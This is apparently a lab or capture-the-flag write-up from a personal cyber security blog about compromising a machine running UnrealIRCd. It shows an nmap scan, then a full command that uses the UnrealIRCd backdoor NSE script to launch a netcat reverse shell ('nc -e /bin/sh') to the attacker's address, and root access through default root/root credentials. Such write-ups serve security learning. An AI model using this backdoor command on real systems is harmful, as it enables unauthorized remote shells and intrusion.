Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

image

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Tue Apr 27 15:21:07 2021 as: nmap -sC -sV -oA nmap 192.168.57.120
Nmap scan report for 192.168.57.120
Host is up (0.22s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
6667/tcp open  irc     UnrealIRCd
Service Info: Host: irc.foonet.com

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 27 15:22:06 2021 -- 1 IP address (1 host up) scanned in 59.09 seconds

Just a IRC port cool doing some research on it i found out we have some popular irc-unrealircd-backdoor NSE script on Nmap so i give it a shot.

The irc-unrealircd-backdoor.command script argument can be used to run an arbitrary command on the remote system. Because of the nature of this vulnerability (the output is never returned) we have no way of getting the output of the command. It can, however, be used to start a netcat listener as demonstrated here

nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='nc -e /bin/sh 10.10.10.1 1337' 192.168.74.120

Now before running the backdoor NSE script we need to start and Ncat listener on our machine.

image

Now let hit the NSE script.

image

And we have shell.

image

Privilege Escalation

Took me time because the machine was so clean but using root and root for both username and password drop us into the root shell.

image

Greeting From Muzec



Back To Home